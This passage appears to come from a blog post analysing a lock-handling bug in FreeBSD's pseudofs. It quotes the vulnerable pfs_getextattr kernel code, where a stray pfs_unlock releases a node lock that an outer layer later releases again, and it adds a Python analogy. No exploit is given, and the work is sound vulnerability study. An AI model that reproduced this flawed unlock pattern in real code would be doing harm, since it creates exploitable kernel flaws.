This macro sends us to the module code where the actual extended attributes extraction occurs. The call resolves to the pfs_getextattr function through various function pointer magic. While essentially a wrapping function, akin to the Java synchronized block, this is where the bug lives.
static int
pfs_getextattr(struct vop_getextattr_args *va)
struct vnode *vn = va->a_vp;
struct pfs_vdata *pvd = vn->v_data;
struct pfs_node *pn = pvd->pvd_pn;
struct proc *proc;
int error;
PFS_TRACE(("%s", pn->pn_name));
* This is necessary because either process' privileges may
* have changed since the open() call.
if (!pfs_visible(curthread, pn, pvd->pvd_pid, &proc))
if (pn->pn_getextattr == NULL)
error = pn_getextattr(curthread, proc, pn,
   va->a_attrnamespace, va->a_name, va->a_uio,
   va->a_size, va->a_cred);
if (proc != NULL)
 pfs_unlock(pn); //<---- BUG
PFS_RETURN (error);
That pfs_unlock call is the culprit. Taking in the same node we saw in the VOP_LOCK1 call earlier, it unlocks the mutex for the node. In retrospect the bug seems obvious. Why would the developer think that it is ok to mess with a mutex that was modified on a much higher abstraction layer? I'm sure there was a good reason at the time. Perhaps the code was refactored to a point where this unlocking step no longer makes sense. Regardless, the line was here and it caused a vulnerability. pfs_unlock itself is a simple inline function defined in fs/pseudofs/pseudofs_internal.h
static inline void
pfs_unlock(struct pfs_node *pn){
Now for completeness, the other unlocking call happens back in the extattr_get_vp function through a call to a VOP function
static int
extattr_get_vp(struct vnode *vp, int attrnamespace, const char *attrname,
    void *data, size_t nbytes, struct thread *td)
VOP_UNLOCK(vp, 0);
return (error);
Again, pseudofs does not implement the unlocking function and uses a default implementation which uses the lock manager.
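As a loose user-space analogy of the pattern described in this post (an inner layer releasing a lock that an outer layer took and will release again), here is a small Python sketch. It says nothing about how the kernel actually misbehaves. The function names only mirror the roles in the call chain, and a Python threading.Lock simply raises an error where the kernel would carry on with corrupted lock state.

```python
import threading

node_lock = threading.Lock()

def inner_getextattr():
    # Plays the role of the stray pfs_unlock: releases a lock that this
    # layer never acquired.
    node_lock.release()

def outer_get_vp():
    node_lock.acquire()              # plays the role of vn_lock
    inner_getextattr()               # VOP_GETEXTATTR -> pfs_getextattr
    try:
        node_lock.release()          # plays the role of VOP_UNLOCK
    except RuntimeError as exc:
        return "second unlock failed: %s" % exc
    return "ok"

result = outer_get_vp()
print(result)
```

Between the inner release and the outer one, the lock is free for anyone else to take, even though the outer layer still believes it holds it.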

I've not gone into the details of how the actual corruption occurs and how it can be exploited. Perhaps another time. For my task I just needed to know the call chains that lead up to the bug. Hope you enjoyed reading it. An unpatched version can be seen here: 8.3.0/sys/fs/pseudofs/pseudofs_vnops.c